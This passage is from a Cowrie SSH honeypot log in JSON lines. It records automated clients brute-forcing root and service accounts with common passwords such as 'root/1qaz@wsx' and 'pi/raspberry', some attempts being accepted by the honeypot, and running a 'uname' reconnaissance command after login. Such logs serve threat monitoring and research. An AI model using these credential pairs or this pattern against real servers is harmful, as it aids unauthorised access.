nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:22:37.547115Z","src_ip":"212.227.125.160","session":"f15061a8101d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:38.753783Z","src_ip":"41.226.27.251","session":"5e24725ff10d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f07521a7c41c","protocol":"ssh","message":"New connection: 41.226.27.251:43296 (1.2.3.4:22) [session: f07521a7c41c]","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.418392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.419266Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.464273Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.601110Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:22:57.705733Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.706397Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.751413Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:22:57.752393Z","src_ip":"41.226.27.251","session":"f07521a7c41c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59036,"dst_ip":"1.2.3.4","dst_port":22,"session":"448f98f6d2f3","protocol":"ssh","message":"New connection: 212.227.235.229:59036 (1.2.3.4:22) [session: 448f98f6d2f3]","sensor":"my-vps","timestamp":"2025-08-31T02:23:01.769639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:02.515944Z","src_ip":"212.227.235.229","session":"448f98f6d2f3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:23:02.516811Z","src_ip":"212.227.235.229","session":"448f98f6d2f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:23:02.883957Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:23:02.884629Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54976,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf7c1c1b0da1","protocol":"ssh","message":"New connection: 212.227.235.229:54976 (1.2.3.4:22) [session: cf7c1c1b0da1]","sensor":"my-vps","timestamp":"2025-08-31T02:23:03.173474Z"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"password1","message":"login attempt [elasticsearch/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:23:08.460196Z","src_ip":"212.227.235.229","session":"448f98f6d2f3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:10.285220Z","src_ip":"212.227.235.229","session":"448f98f6d2f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"13.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:16.223975Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.session.closed","duration":"109.1","message":"Connection lost after 109.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:16.225075Z","src_ip":"212.227.235.229","session":"533bb8bc39f4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:16.867740Z","src_ip":"212.227.235.229","session":"cf7c1c1b0da1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:23:16.870338Z","src_ip":"212.227.235.229","session":"cf7c1c1b0da1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41764,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a8cb1cb71e6","protocol":"ssh","message":"New connection: 41.226.27.251:41764 (1.2.3.4:22) [session: 5a8cb1cb71e6]","sensor":"my-vps","timestamp":"2025-08-31T02:23:17.707618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:17.876284Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:23:17.877016Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:23:18.149924Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:23:18.254112Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:23:18.254883Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:18.301503Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:18.302736Z","src_ip":"41.226.27.251","session":"5a8cb1cb71e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49718,"dst_ip":"1.2.3.4","dst_port":22,"session":"af8a1c38a1b4","protocol":"ssh","message":"New connection: 212.227.125.160:49718 (1.2.3.4:22) [session: af8a1c38a1b4]","sensor":"my-vps","timestamp":"2025-08-31T02:23:23.994033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:24.434192Z","src_ip":"212.227.125.160","session":"af8a1c38a1b4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:23:24.434913Z","src_ip":"212.227.125.160","session":"af8a1c38a1b4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T02:23:26.293478Z","src_ip":"212.227.125.160","session":"f15061a8101d"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"password1","message":"login attempt [elasticsearch/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:23:26.569363Z","src_ip":"212.227.125.160","session":"af8a1c38a1b4"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:28.163823Z","src_ip":"212.227.125.160","session":"af8a1c38a1b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58390,"dst_ip":"1.2.3.4","dst_port":22,"session":"0738527616a3","protocol":"ssh","message":"New connection: 212.227.125.160:58390 (1.2.3.4:22) [session: 0738527616a3]","sensor":"my-vps","timestamp":"2025-08-31T02:23:33.967167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:33.968113Z","src_ip":"212.227.125.160","session":"0738527616a3"}
{"eventid":"cowrie.session.closed","duration":"64.2","message":"Connection lost after 64.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:34.061146Z","src_ip":"212.227.125.160","session":"f15061a8101d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:23:34.156295Z","src_ip":"212.227.125.160","session":"0738527616a3"}
{"eventid":"cowrie.login.success","username":"root","password":"john@123","message":"login attempt [root/john@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:23:34.724705Z","src_ip":"212.227.125.160","session":"0738527616a3"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:34.914611Z","src_ip":"212.227.125.160","session":"0738527616a3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44386,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a61848649d4","protocol":"ssh","message":"New connection: 41.226.27.251:44386 (1.2.3.4:22) [session: 2a61848649d4]","sensor":"my-vps","timestamp":"2025-08-31T02:23:38.175527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:38.263291Z","src_ip":"41.226.27.251","session":"2a61848649d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:23:38.264482Z","src_ip":"41.226.27.251","session":"2a61848649d4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T02:23:38.408789Z","src_ip":"212.227.235.229","session":"cf7c1c1b0da1"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:23:38.499655Z","src_ip":"41.226.27.251","session":"2a61848649d4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:39.731207Z","src_ip":"41.226.27.251","session":"2a61848649d4"}
{"eventid":"cowrie.session.closed","duration":"44.2","message":"Connection lost after 44.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:47.412476Z","src_ip":"212.227.235.229","session":"cf7c1c1b0da1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46182,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c2327ee8579","protocol":"ssh","message":"New connection: 212.227.125.160:46182 (1.2.3.4:22) [session: 4c2327ee8579]","sensor":"my-vps","timestamp":"2025-08-31T02:23:53.765367Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52266,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e3eb86a28d6","protocol":"ssh","message":"New connection: 41.226.27.251:52266 (1.2.3.4:22) [session: 1e3eb86a28d6]","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.270700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.271613Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.315409Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.451365Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:23:59.559738Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.560421Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:23:59.606035Z","src_ip":"41.226.27.251","session":"1e3eb86a28d6"}
